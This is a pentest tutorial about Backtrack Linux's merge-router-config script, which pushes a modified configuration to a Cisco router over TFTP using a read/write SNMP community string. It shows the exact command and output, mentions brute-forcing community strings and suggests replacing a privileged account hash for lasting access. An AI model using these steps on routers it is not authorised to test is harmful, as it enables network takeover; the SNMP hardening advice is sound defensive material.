The merge-router-config menu item in Backtrack Linux, which is located in the Backtrack Menu ( Backtrack > Vulnerability Assessment > Network Assessment > Cisco Tools ), allows you to make changes to a Cisco router configuration file and merge those changes to a Cisco router. You should be extremely careful with this script as it will make changes to the target Cisco router. Below we describe the tool in more detail and show examples of merging a router configuration file to a Cisco 861 router.
Information Needed To Successfully Merge Cisco Router Configuration:
First you will need a RW or read/write community string for the target Cisco router, a running TFTP server, and a Cisco router configuration file that you can make changes to. Once you have obtained the RW community string for the Cisco router either by brute force using a Backtrack tool (ADMsnmp or onesixtyone) or by other means you can setup a TFTP server and obtain the current Cisco router configuration using the information in this article about the copy-router-config tool in Backtrack Linux.
Merge Cisco Router Configuration:
Once you have modified the Cisco router configuration file which could be as simple as modifying the motd (Message of the Day) banner to let the client know the potential vulnerability or by actually modifying routing information, enabling/disabling interfaces, or similar then you are ready to rock. Place the modified router configuration file in the /srv/tftp directory on Backtrack (make sure it is named pwnd-router.config) and use the below example to construct a command using the merge-router-config Perl script to write changes to the target Cisco router. If you were going to work with a lot of Cisco routers you might want to update the script and change the $merge_f variable to $ARGV[3] which would then add a 4th command line requirement when issuing the command which would be the name of the Cisco router configuration file that you were merging into the target Cisco router.
merge-router-config Perl Script On Backtrack Linux:
- root@bt:/pentest/cisco/copy-router-config# perl merge-router-config.pl 192.168.1.22 192.168.1.88 private
- 192.168.1.88:pwnd-router.config -> 192.168.1.22:running-config... OK
- root@bt:/pentest/cisco/copy-router-config
The above command took about 10 seconds to complete though this will vary depending on the size of the Cisco router configuration file. That is really it… you have now updated the target router with whatever changes you wanted to make. You could for instance change the hash to an account on the Cisco router with level 15 privileges and while the read/write SNMP community string pretty much provides the same access you will have direct full access to the router moving forward. It should also be noted though that depending on the monitoring of the target Cisco router writing changes to the Cisco router will trigger an alert similar to the two messages output in the example below that were displayed on the console of the target Cisco router.
Console Messages On Cisco Router When Merging Changes Via merge-router-config:
- Dec 26 15:45:19.823: % Multiple self signed certificates in config
- certificate for trust point TP-self-signed-2351550040 ignored
- Dec 26 15:45:20.039: %SYS-5-CONFIG_I: Configured from tftp://192.168.1.88/pwnd-router.config by console
Now you can say you pwned a Cisco router. :) This should provide you with enough ammo to convince the owner of the Cisco router how important it is that if SNMP has to be enabled on the device that it should have limited access from specific IP addresses. Thanks again to Muts for a great Perl script.